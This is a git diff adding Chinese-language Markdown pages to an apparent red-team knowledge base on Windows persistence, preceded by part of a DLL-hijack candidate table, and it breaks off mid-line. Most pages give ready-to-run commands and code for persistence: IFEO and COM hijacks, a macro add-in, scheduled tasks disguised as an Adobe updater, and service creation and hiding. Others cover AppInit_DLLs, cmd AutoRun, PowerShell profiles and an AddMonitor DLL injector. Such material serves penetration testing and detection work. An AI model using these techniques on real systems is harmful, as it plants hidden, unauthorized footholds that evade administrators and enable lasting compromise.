| SspiCli.dll | DllMain | +| ❌ | wkspbroker.exe | tsworkspace.dll | DllMain | +| ❌ | wkspbroker.exe | WINHTTP.dll | DllMain | +| ❌ | wkspbroker.exe | WININET.dll | DllMain | +| ❌ | wksprt.exe | webservices.dll | DllMain | +| ❌ | wksprt.exe | WININET.dll | DllMain | +| ❌ | wlrmdr.exe | SspiCli.dll | DllMain | +| ❌ | wmpdmc.exe | dwmapi.dll | DllMain | +| ❌ | wmpdmc.exe | OLEACC.dll | DllMain | +| ❌ | wmpdmc.exe | UxTheme.dll | DllMain | +| ❌ | wmpdmc.exe | WindowsCodecs.dll | DllMain | +| ❌ | wmpdmc.exe | wmpdui.dll | DllMain | +| ❌ | workfolders.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | workfolders.exe | CLDAPI.dll | DllMain | +| ❌ | workfolders.exe | CRYPTBASE.DLL | DllMain | +| ❌ | workfolders.exe | DEVOBJ.dll | DllMain | +| ❌ | workfolders.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | workfolders.exe | edputil.dll | DllMain | +| ❌ | workfolders.exe | edputil.dll | EdpGetIsManaged | +| ❌ | workfolders.exe | FLTLIB.DLL | DllMain | +| ❌ | workfolders.exe | policymanager.dll | DllMain | +| ❌ | workfolders.exe | PROPSYS.dll | DllMain | +| ❌ | workfolders.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | workfolders.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | workfolders.exe | USERENV.dll | DllMain | +| ❌ | workfolders.exe | USERENV.dll | GetProfileType | +| ❌ | wowreg32.exe | devrtl.DLL | DllMain | +| ❌ | wpcmon.exe | samcli.dll | DllMain | +| ❌ | wpcmon.exe | USERENV.dll | DllMain | +| ❌ | wpnpinst.exe | Cabinet.dll | DllMain | +| ❌ | wpnpinst.exe | IPHLPAPI.DLL | DllMain | +| ❌ | wpnpinst.exe | PROPSYS.dll | DllMain | +| ❌ | wpr.exe | WindowsPerformanceRecorderControl.dll | DllMain | +| ❌ | write.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | write.exe | CLDAPI.dll | DllMain | +| ❌ | write.exe | CRYPTBASE.DLL | DllMain | +| ❌ | write.exe | edputil.dll | DllMain | +| ❌ | write.exe | edputil.dll | EdpGetIsManaged | +| ❌ | write.exe | FLTLIB.DLL | DllMain | +| ❌ | write.exe | PROPSYS.dll | DllMain | +| ❌ | write.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | write.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | wscadminui.exe | CRYPTBASE.DLL | DllMain | +| ❌ | wsmanhttpconfig.exe | DSROLE.dll | DllMain | +| ❌ | wsmanhttpconfig.exe | HTTPAPI.dll | DllMain | +| ❌ | wsmanhttpconfig.exe | HTTPAPI.dll | HttpInitialize | +| ❌ | wsmanhttpconfig.exe | HTTPAPI.dll | HttpTerminate | +| ❌ | wsmanhttpconfig.exe | mi.dll | DllMain | +| ❌ | wsmanhttpconfig.exe | miutils.dll | DllMain | +| ❌ | wsmprovhost.exe | DSROLE.dll | DllMain | +| ❌ | wsmprovhost.exe | mi.dll | DllMain | +| ❌ | wsmprovhost.exe | miutils.dll | DllMain | + diff --git a/persistence/image-file-execution-options/README.md b/persistence/image-file-execution-options/README.md new file mode 100644 index 0000000..857205c --- /dev/null +++ b/persistence/image-file-execution-options/README.md @@ -0,0 +1,2 @@ +# 映像劫持 + diff --git a/persistence/image-file-execution-options/image-file-execution-options.md b/persistence/image-file-execution-options/image-file-execution-options.md new file mode 100644 index 0000000..2b6b8cb --- /dev/null +++ b/persistence/image-file-execution-options/image-file-execution-options.md @@ -0,0 +1,32 @@ +# 映像劫持 + +## 劫持程序退出事件 + +命令行 + +```text +# Use notepad as example + +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 + +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 + +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Temp\qwqdanchun.exe" +``` + +## 劫持程序调试选项 + +命令行 + +```text +copy C:\Temp\qwqdanchun.exe C:\Windows\System32\qwqdanchun.exe + +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "qwqdanchun.exe" +``` + +参考文章: + +{% embed url="https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" caption="" %} + +{% embed url="https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/" caption="" %} + diff --git a/persistence/office/README.md b/persistence/office/README.md new file mode 100644 index 0000000..6c8180d --- /dev/null +++ b/persistence/office/README.md @@ -0,0 +1,2 @@ +# Office + diff --git a/persistence/office/com-hijack.md b/persistence/office/com-hijack.md new file mode 100644 index 0000000..7716cdf --- /dev/null +++ b/persistence/office/com-hijack.md @@ -0,0 +1,23 @@ +# COM劫持 + +Outlook在启动时会加载多个COM对象,我们可以通过修改注册表的方式劫持Outlook的启动过程,用来加载DLL。 + +```text +#32bit office on 32bit windows/64bit office on 64bit windows +reg add HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f +reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f +reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f +reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f +#32bit office on 64bit windows +reg add HKCU\Software\Classes\Wow6432Node\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f +reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f +reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f +reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f +``` + +参考文章: + +{% embed url="https://www.welivesecurity.com/2018/08/22/turla-unique-outlook-backdoor/" caption="" %} + +{% embed url="https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-Outlook/" caption="" %} + diff --git a/persistence/office/macro-enabled-add-in-file.md b/persistence/office/macro-enabled-add-in-file.md new file mode 100644 index 0000000..4724f22 --- /dev/null +++ b/persistence/office/macro-enabled-add-in-file.md @@ -0,0 +1,41 @@ +# 模板文件 + +下文中的xlam、xla、ppam、ppa文件均为office模板文件,在其中添加宏,可以实现在打开文件时自动加载模板,并执行宏的效果,此处是一个简单的调用exe的宏示例 + +```text +Sub Auto_Open() + Set objShell = CreateObject("Wscript.Shell") + objShell.Exec ("C:\Temp\qwqdanchun.exe") +End Sub +``` + +## EXCEL VBA + +命令行: + +```text +#xlam +COPY C:\Temp\qwqdanchun.xlam %appdata%\Microsoft\Excel\XLSTART\qwqdanchun.xlam + +#xla +COPY C:\Temp\qwqdanchun.xla %appdata%\Microsoft\Excel\XLSTART\qwqdanchun.xla +``` + +打开Excel时,无论是新建的电子表格还是以前保存的电子表格,都将执行该加载项。 + +## POWERPOINT VBA + +可以使用与Excel相同的方式来创建PowerPoint VBA加载项 + +```text +#ppam +COPY C:\Temp\qwqdanchun.ppam %appdata%\Microsoft\AddIns\qwqdanchun.ppam +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Autoload /t REG_DWORD /d 1 /f +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Path /t REG_DWORD /d "qwqdanchun.ppam" /f + +#ppa +COPY C:\Temp\qwqdanchun.ppa %appdata%\Microsoft\AddIns\qwqdanchun.ppa +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Autoload /t REG_DWORD /d 1 /f +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Path /t REG_DWORD /d "qwqdanchun.ppa" /f +``` + diff --git a/persistence/office/vsto.md b/persistence/office/vsto.md new file mode 100644 index 0000000..dd197dd --- /dev/null +++ b/persistence/office/vsto.md @@ -0,0 +1,8 @@ +# VSTO + +参考文章: + +{% embed url="https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/" caption="" %} + +{% embed url="https://vanmieghem.io/stealth-outlook-persistence/" caption="" %} + diff --git a/persistence/office/wll-xll.md b/persistence/office/wll-xll.md new file mode 100644 index 0000000..4bddffa --- /dev/null +++ b/persistence/office/wll-xll.md @@ -0,0 +1,28 @@ +# WLL/XLL + +## WLL + +是指“.wll”扩展名的“Word加载项”。这是一个Word 97时代的老东西,但似乎仍受支持。“.wll”文件本质上是具有Office特定扩展名的DLL。这意味着它支持基本的DLL功能,因此您可以将“.dll”重命名为“.wll”来使用。 + +命令行: + +```text +copy C:\Temp\qwqdanchun.dll %APPDATA%\Microsoft\Word\Startup\qwqdanchun.wll +``` + +## XLL + +类似于WLL,也是具有Office特定扩展名的DLL,适用于Excel。但是其dll构造时注意要将恶意代码放在导出函数“xlAutoOpen”中来保证其被加载。 + +命令行: + +```text +copy C:\Temp\qwqdanchun.dll %APPDATA%\Microsoft\AddIns\qwqdanchun.xll +#remember to change “15.0” to your version +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Options" /v OPEN /t REG_SZ /d "/R qwqdanchun.xll” +``` + +参考文章: + +{% embed url="https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/" caption="" %} + diff --git a/persistence/rootkit/README.md b/persistence/rootkit/README.md new file mode 100644 index 0000000..1385978 --- /dev/null +++ b/persistence/rootkit/README.md @@ -0,0 +1,2 @@ +# Rootkit + diff --git a/persistence/rootkit/rootkit.md b/persistence/rootkit/rootkit.md new file mode 100644 index 0000000..d95d1e9 --- /dev/null +++ b/persistence/rootkit/rootkit.md @@ -0,0 +1,26 @@ +# Rootkit + +此处仅讨论狭义的Rootkit,也就是通过加载驱动进入r0实现的权限维持。 + +## 方法一: + +利用现有驱动漏洞,实现获取ring0权限,并长期驻留。 + +## 方法二: + +自己制作驱动,并添加数字签名,以加载进系统,并驻留。 + +## 备注: + +无论是挖掘漏洞还是自己写驱动,都需要多方面的知识,所以此处无法列出合适的POC,但是我会将一些相关资料列在下方,有兴趣的同学可以自己学习。 + +开源实例: + +{% embed url="https://github.com/uf0o/rootkit-arsenal-guacamole" caption="" %} + +参考文章: + +{% embed url="https://en.wikipedia.org/wiki/Rootkit" caption="" %} + +{% embed url="https://bbs.pediy.com/thread-260708.htm" caption="" %} + diff --git a/persistence/schtasks/README.md b/persistence/schtasks/README.md new file mode 100644 index 0000000..c12eae9 --- /dev/null +++ b/persistence/schtasks/README.md @@ -0,0 +1,2 @@ +# 计划任务 + diff --git a/persistence/schtasks/add-schtasks.md b/persistence/schtasks/add-schtasks.md new file mode 100644 index 0000000..dfc64df --- /dev/null +++ b/persistence/schtasks/add-schtasks.md @@ -0,0 +1,24 @@ +# 新建任务 + +命令行: + +```text +# On System Startschtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onstart /ru System# On User Idle (30mins)schtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onidle /i 30# On User Loginschtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onlogon /ru System +``` + +Powershell: + +```text +$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c c:\Temp\qwqdanchun.exe"$T = New-ScheduledTaskTrigger -AtLogOn -User "qwqdanchun"$P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest$S = New-ScheduledTaskSettingsSet$P = New-ScheduledTaskPrincipal "qwqdanchun"$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $SRegister-ScheduledTask qwqdanchun -InputObjec $D +``` + +C\#: + +```text +using Microsoft.Win32.TaskScheduler;using System;namespace demo{ static class Program { static void Main() { TaskService ts = new TaskService(); TaskDefinition td = ts.NewTask(); td.RegistrationInfo.Description = "This task keeps your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes"; td.RegistrationInfo.Author = "Adobe Scheduler"; TimeTrigger dt = new TimeTrigger(); dt.StartBoundary = Convert.ToDateTime(DateTime.Now.ToString("yyyy-MM-dd 06:30:00")); dt.Repetition.Interval = TimeSpan.FromMinutes(5); td.Triggers.Add(dt); td.Settings.DisallowStartIfOnBatteries = false; td.Settings.RunOnlyIfNetworkAvailable = true; td.Settings.RunOnlyIfIdle = false; td.Settings.DisallowStartIfOnBatteries = false; td.Actions.Add(new ExecAction(@"c:\Temp\qwqdanchun.exe", "", null)); ts.RootFolder.RegisterTaskDefinition(@"Adobe Acrobat Update Task", td); } }} +``` + +参考文章: + +{% embed url="https://docs.microsoft.com/zh-cn/windows/win32/taskschd/using-the-task-scheduler" caption="" %} + diff --git a/persistence/service/README.md b/persistence/service/README.md new file mode 100644 index 0000000..a41238f --- /dev/null +++ b/persistence/service/README.md @@ -0,0 +1,2 @@ +# 服务 + diff --git a/persistence/service/edit-service.md b/persistence/service/edit-service.md new file mode 100644 index 0000000..58b6c11 --- /dev/null +++ b/persistence/service/edit-service.md @@ -0,0 +1,16 @@ +# 修改服务 + +修改Fax服务文件路径: + +```text +sc config Fax binPath= "C:\Temp\qwqdanchun.exe" start="auto" obj="LocalSystem" + +sc start Fax +``` + +或 + +```text +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fax" /v ImagePath /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f +``` + diff --git a/persistence/service/hide-service.md b/persistence/service/hide-service.md new file mode 100644 index 0000000..8cf5e5a --- /dev/null +++ b/persistence/service/hide-service.md @@ -0,0 +1,20 @@ +# 隐藏服务 + +隐藏: + +```text +sc.exe sdset qwqdanchun "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" +``` + +恢复: + +```text +sc.exe sdset qwqdanchun "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" +``` + +参考文章: + +{% embed url="https://www.freebuf.com/articles/system/254838.html" caption="" %} + +{% embed url="https://www.sans.org/blog/red-team-tactics-hiding-windows-services/" caption="" %} + diff --git a/persistence/service/hijack-service.md b/persistence/service/hijack-service.md new file mode 100644 index 0000000..0bd9d6f --- /dev/null +++ b/persistence/service/hijack-service.md @@ -0,0 +1,12 @@ +# 劫持服务 + +劫持关闭事件: + +```text +#REG +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fax" /v FailureCommand /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f + +#SC +sc failure Fax command= "\"C:\Temp\qwqdanchun.exe\"" +``` + diff --git a/persistence/service/new-service.md b/persistence/service/new-service.md new file mode 100644 index 0000000..6ea8b5a --- /dev/null +++ b/persistence/service/new-service.md @@ -0,0 +1,18 @@ +# 新建服务 + +1.命令行创建 + +```text +sc create qwqdanchun binpath= "cmd.exe /k C:\Temp\qwqdanchun.exe" start="auto" obj="LocalSystem" + +sc start qwqdanchun +``` + +2.Powershell + +```text +New-Service -Name "qwqdanchun" -BinaryPathName "C:\Temp\qwqdanchun.exe" -Description "Service by qwqdanchun" -StartupType Automatic + +sc start qwqdanchun +``` + diff --git a/persistence/startup/README.md b/persistence/startup/README.md new file mode 100644 index 0000000..f2694ed --- /dev/null +++ b/persistence/startup/README.md @@ -0,0 +1,2 @@ +# 启动项 + diff --git a/persistence/startup/folder.md b/persistence/startup/folder.md new file mode 100644 index 0000000..af65854 --- /dev/null +++ b/persistence/startup/folder.md @@ -0,0 +1,11 @@ +# 文件夹 + +| 目录 | +| :--- | +| shell:startup | +| %appdata%\Microsoft\Windows\Start Menu\Programs\Startup | +| C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | +| shell:common startup | +| %programdata%\Microsoft\Windows\Start Menu\Programs\Startup | +| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp | + diff --git a/persistence/startup/registry.md b/persistence/startup/registry.md new file mode 100644 index 0000000..dddee10 --- /dev/null +++ b/persistence/startup/registry.md @@ -0,0 +1,78 @@ +# 注册表 + +Flag:等有时间,每一条都写个poc或者解释下利用方法 + +| 注册表项 | +| :--- | +| HKCU\Environment\UserInitMprLogonScript | +| HKCU\Software\Classes\*\ShellEx\ContextMenuHandlers | +| HKCU\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers | +| HKCU\Software\Classes\Directory\ShellEx\ContextMenuHandlers | +| HKCU\Software\Classes\Directory\Shellex\DragDropHandlers | +| HKCU\Software\Classes\Drive\ShellEx\ContextMenuHandlers | +| HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run | +| HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | +| HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\Shell | +| HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | +| HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | +| HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | +| HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | +| HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | +| HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows | +| HKCU\Software\Policies\Microsoft\Windows\System\Scripts | +| HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | +| HKLM\Software\Classes\*\ShellEx\PropertySheetHandlers | +| HKLM\Software\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance | +| HKLM\Software\Classes\CLSID{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance | +| HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers | +| HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers | +| HKLM\Software\Classes\Directory\Shellex\CopyHookHandlers | +| HKLM\Software\Classes\Directory\Shellex\DragDropHandlers | +| HKLM\Software\Classes\Filter | +| HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers | +| HKLM\Software\Classes\Folder\ShellEx\DragDropHandlers | +| HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components | +| HKLM\Software\Microsoft\Rpc\Extensions | +| HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 | +| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers | +| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | +| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler | +| HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers | +| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects | +| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | +| HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | +| HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | +| HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | +| HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | +| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | +| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | +| HKLM\Software\Policies\Microsoft\Windows\System\Scripts | +| HKLM\Software\Wow6432Node\Classes\*\ShellEx\ContextMenuHandlers | +| HKLM\Software\Wow6432Node\Classes\*\ShellEx\PropertySheetHandlers | +| HKLM\Software\Wow6432Node\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance | +| HKLM\Software\Wow6432Node\Classes\CLSID{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance | +| HKLM\Software\Wow6432Node\Classes\Directory\Background\ShellEx\ContextMenuHandlers | +| HKLM\Software\Wow6432Node\Classes\Directory\ShellEx\ContextMenuHandlers | +| HKLM\Software\Wow6432Node\Classes\Directory\Shellex\DragDropHandlers | +| HKLM\Software\Wow6432Node\Classes\Drive\ShellEx\ContextMenuHandlers | +| HKLM\Software\Wow6432Node\Classes\Folder\ShellEx\ContextMenuHandlers | +| HKLM\Software\Wow6432Node\Classes\Folder\ShellEx\DragDropHandlers | +| HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components | +| HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32 | +| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler | +| HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers | +| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects | +| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | +| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | +| HKLM\System\CurrentControlSet\Control\Lsa\ | +| HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages | +| HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages | +| HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors | +| HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors | +| HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls | +| HKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\ | +| HKLM\System\CurrentControlSet\Services | +| HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol\_Catalog9\Catalog\_Entries | +| HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol\_Catalog9\Catalog\_Entries64 | +| HKU\*\software\microsoft\windows\currentversion\explorer\user shell folders\startup | + diff --git a/persistence/uncatelogued/README.md b/persistence/uncatelogued/README.md new file mode 100644 index 0000000..08822ba --- /dev/null +++ b/persistence/uncatelogued/README.md @@ -0,0 +1,2 @@ +# 未分类 + diff --git a/persistence/uncatelogued/addmonitor.md b/persistence/uncatelogued/addmonitor.md new file mode 100644 index 0000000..8029141 --- /dev/null +++ b/persistence/uncatelogued/addmonitor.md @@ -0,0 +1,34 @@ +# AddMonitor + +AddMonitor\(\)函数,可用于安装本地端口监视器并配置连接、数据和监视器文件。此函数能够将DLL注入spoolsv.exe进程,以在系统上实现持久性。 + +C++ + +```cpp +#include "stdafx.h" +#include "Windows.h" +int main() { + MONITOR_INFO_2 monitorInfo; + TCHAR env[12] = TEXT("Windows x64"); + TCHAR name[12] = TEXT("evilMonitor"); + TCHAR dll[12] = TEXT("qwqdanchun.dll"); + monitorInfo.pName = name; + monitorInfo.pEnvironment = env; + monitorInfo.pDLLName = dll; + AddMonitor(NULL, 2, (LPBYTE)&monitorInfo); + return 0; +} +//Compile to monitor.exe and move your evil DLL to %systemroot% then run the compiled monitor.exe +``` + +```text +#Then run this command +reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /t REG_SZ /d "qwqdanchun.dll" /f +``` + +参考文章: + +{% embed url="https://www.ired.team/offensive-security/persistence/t1013-addmonitor" caption="" %} + +{% embed url="https://docs.microsoft.com/en-us/windows/win32/printdocs/addmonitor" caption="" %} + diff --git a/persistence/uncatelogued/appinit-dlls-inject.md b/persistence/uncatelogued/appinit-dlls-inject.md new file mode 100644 index 0000000..b773268 --- /dev/null +++ b/persistence/uncatelogued/appinit-dlls-inject.md @@ -0,0 +1,14 @@ +# AppInit\_DLLs注入 + +User32.dll被加载到进程时,会加载”HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows”中Appinit\_Dlls的值,修改其值可以使其加载恶意的脚本 + +```text +#Win10 +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Temp\qwqdanchun.dll" /f +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f +#others +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Temp\qwqdanchun.dll" /f +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0x0 /f +``` + diff --git a/persistence/uncatelogued/bios.md b/persistence/uncatelogued/bios.md new file mode 100644 index 0000000..4d161f4 --- /dev/null +++ b/persistence/uncatelogued/bios.md @@ -0,0 +1,12 @@ +# Bios + +现有产品: + +{% embed url="https://www.absolute.com/platform/persistence/\#" caption="" %} + +参考文章: + +{% embed url="https://securelist.com/absolute-computrace-revisited/58278/" caption="" %} + +{% embed url="https://bartblaze.blogspot.com/2014/11/thoughts-on-absolute-computrace.html" caption="" %} + diff --git a/persistence/uncatelogued/command-processor.md b/persistence/uncatelogued/command-processor.md new file mode 100644 index 0000000..574c9f6 --- /dev/null +++ b/persistence/uncatelogued/command-processor.md @@ -0,0 +1,10 @@ +# cmd启动劫持 + +在cmd启动时会去注册表“HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Command Processor”中查看是否有AutoRun的健值,如果有则会运行其中的内容 + +命令行: + +```text +reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "c:\Temp\qwqdanchun.exe" /f +``` + diff --git a/persistence/uncatelogued/hijack-update-program.md b/persistence/uncatelogued/hijack-update-program.md new file mode 100644 index 0000000..6176f2f --- /dev/null +++ b/persistence/uncatelogued/hijack-update-program.md @@ -0,0 +1,10 @@ +# 劫持更新程序 + +通过修改DNS,ARP欺骗等方法可以劫持程序查找更新的流量。 + +有很多程序启动时会连接网络并检查更新,可以借此实现持久化。 + +参考项目: + +{% embed url="https://github.com/infobyte/evilgrade" caption="" %} + diff --git a/persistence/uncatelogued/laps.md b/persistence/uncatelogued/laps.md new file mode 100644 index 0000000..1631986 --- /dev/null +++ b/persistence/uncatelogued/laps.md @@ -0,0 +1,12 @@ +# 利用LAPS + +“本地管理员密码解决方案”(LAPS)在Active Directory(AD)中提供了机密/密码的集中存储。组织的域管理员可以确定哪些用户有权读取密码。([https://docs.microsoft.com/en-us/previous-versions/mt227395\(v=msdn.10\)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/mt227395%28v=msdn.10%29?redirectedfrom=MSDN) ) + +可以通过对部署了此项目的主机上LAPS的一些修改实现持久化。 + +参考文章: + +{% embed url="https://rastamouse.me/blog/laps-pt1/" caption="" %} + +{% embed url="https://rastamouse.me/blog/laps-pt2/" caption="" %} + diff --git a/persistence/uncatelogued/powershell-profile.md b/persistence/uncatelogued/powershell-profile.md new file mode 100644 index 0000000..5163d8a --- /dev/null +++ b/persistence/uncatelogued/powershell-profile.md @@ -0,0 +1,31 @@ +# 滥用POWERSHELL配置文件 + +PowerShell启动时会执行配置文件的内容。 + +Powershell: + +```text +echo $profile +Test-Path $profile +New-Item -Path $profile -Type File –Force +$string = 'Start-Process "C:\Temp\qwqdanchun.exe"' +$string | Out-File -FilePath "%HOMEPATH%\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append +``` + +注:Powershell默认配置文件有多个,按照从上到下的顺序优先级从高到低 + +| Description | Path | +| :--- | :--- | +| All Users, All Hosts | $PSHOME\Profile.ps1 | +| All Users, Current Host | $PSHOME\Microsoft.PowerShell\_profile.ps1 | +| Current User, All Hosts | $Home\[My \]Documents\PowerShell\Profile.ps1 | +| Current user, Current Host | $Home\[My \]Documents\PowerShell\Microsoft.PowerShell\_profile.ps1 | + +参考文章: + +{% embed url="https://github.com/enigma0x3/PowershellProfile" caption="" %} + +{% embed 